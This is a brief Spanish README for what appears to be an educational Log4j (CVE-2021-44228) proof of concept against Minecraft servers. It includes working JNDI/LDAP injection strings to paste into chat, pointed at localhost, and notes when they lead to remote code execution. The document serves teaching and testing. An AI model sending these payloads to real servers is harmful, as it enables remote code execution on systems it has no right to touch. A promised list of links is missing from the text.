
Una prueba de concepto educativa para la vulnerabilidad Log4j (CVE-2021-44228) en Minecraft
Este proyecto es solo con fines educativos.
Esta es una prueba de concepto del RCE de Log4j adaptada de HyCraftHD.
Aquí hay algunos enlaces para el CVE-2021-44228:
Este error afecta a casi todas las versiones de Log4j2 y quizás a las de Log4j1. La versión recomendada para usar es 2.15.0, que corrige el exploit.
${jndi:ldap://127.0.0.1/e} en el chat. Si hay un socket abierto en el puerto 389, Log4j intenta conectarse y bloquea la comunicación posterior hasta que se produce un tiempo de espera (timeout).THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, que es un objeto de cadena serializado del servidor LDAP.
${jndi:ldap://127.0.0.1/exe} en el chat. Si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true está establecido en true, se producirá la ejecución remota de código.